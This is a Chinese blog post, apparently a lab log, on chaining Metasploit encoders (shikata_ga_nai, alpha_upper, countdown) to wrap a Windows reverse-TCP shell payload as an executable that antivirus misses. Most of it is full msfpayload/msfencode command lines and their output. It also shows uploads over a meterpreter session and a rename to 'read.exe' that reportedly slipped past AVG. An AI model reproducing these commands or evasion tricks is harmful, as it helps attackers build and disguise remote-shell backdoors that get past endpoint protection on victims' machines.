metasploit多重编码

来源：互联网发布：校园二手源码编辑：程序博客网时间：2024/06/06 04:58

root@bt:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o payload3.exe[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)[*] x86/alpha_upper succeeded with size 967 (iteration=1)[*] x86/alpha_upper succeeded with size 2003 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 2032 (iteration=1)[*] x86/shikata_ga_nai succeeded with size 2061 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 2090 (iteration=3)[*] x86/shikata_ga_nai succeeded with size 2119 (iteration=4)[*] x86/shikata_ga_nai succeeded with size 2148 (iteration=5)[*] x86/countdown succeeded with size 2166 (iteration=1)[*] x86/countdown succeeded with size 2184 (iteration=2)[*] x86/countdown succeeded with size 2202 (iteration=3)[*] x86/countdown succeeded with size 2220 (iteration=4)[*] x86/countdown succeeded with size 2238 (iteration=5)root@bt:~# lsDesktop  payload1.exe  payload2.exe  payload3.exeroot@bt:~# file payload3.exe payload3.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bitroot@bt:~#

生成payload3.exe花了很长时间，大概有半个小时，可能是因为虚拟机，内存只有512MB的缘故。

然后，上传到XP，也还是会报威胁：

meterpreter > upload payload3.exe[*] uploading  : payload3.exe -> payload3.exe[*] uploaded   : payload3.exe -> payload3.exemeterpreter >

书上写的是成功躲过了杀毒软件，但是，我这里，还是报告威胁了，可能因为杀毒软件比较新吧。

后来，我第二次，生成那个payload.exe，就比较快了，不知道为什么。

root@bt:~# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o payload_time.exe[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)[*] x86/alpha_upper succeeded with size 966 (iteration=1)[*] x86/alpha_upper succeeded with size 2000 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 2029 (iteration=1)[*] x86/shikata_ga_nai succeeded with size 2058 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 2087 (iteration=3)[*] x86/shikata_ga_nai succeeded with size 2116 (iteration=4)[*] x86/shikata_ga_nai succeeded with size 2145 (iteration=5)[*] x86/countdown succeeded with size 2163 (iteration=1)[*] x86/countdown succeeded with size 2181 (iteration=2)[*] x86/countdown succeeded with size 2199 (iteration=3)[*] x86/countdown succeeded with size 2217 (iteration=4)[*] x86/countdown succeeded with size 2235 (iteration=5)real    1m34.085suser    0m50.987ssys     0m40.059sroot@bt:~#

但是，在XP里，还是报威胁。

再后来，我想，是不是因为exe文件名的问题，所以，生成了一个很正常的名字readme.exe，这次，竟然躲过了avg杀毒软件的查杀。

root@bt:~# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o read.exe[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)[*] x86/alpha_upper succeeded with size 966 (iteration=1)[*] x86/alpha_upper succeeded with size 2000 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 2029 (iteration=1)[*] x86/shikata_ga_nai succeeded with size 2058 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 2087 (iteration=3)[*] x86/shikata_ga_nai succeeded with size 2116 (iteration=4)[*] x86/shikata_ga_nai succeeded with size 2145 (iteration=5)[*] x86/countdown succeeded with size 2163 (iteration=1)[*] x86/countdown succeeded with size 2181 (iteration=2)[*] x86/countdown succeeded with size 2199 (iteration=3)[*] x86/countdown succeeded with size 2217 (iteration=4)[*] x86/countdown succeeded with size 2235 (iteration=5)real    1m33.468suser    0m52.195ssys     0m39.830sroot@bt:~#

meterpreter > upload read.exe[*] uploading  : read.exe -> read.exe[*] uploaded   : read.exe -> read.exemeterpreter >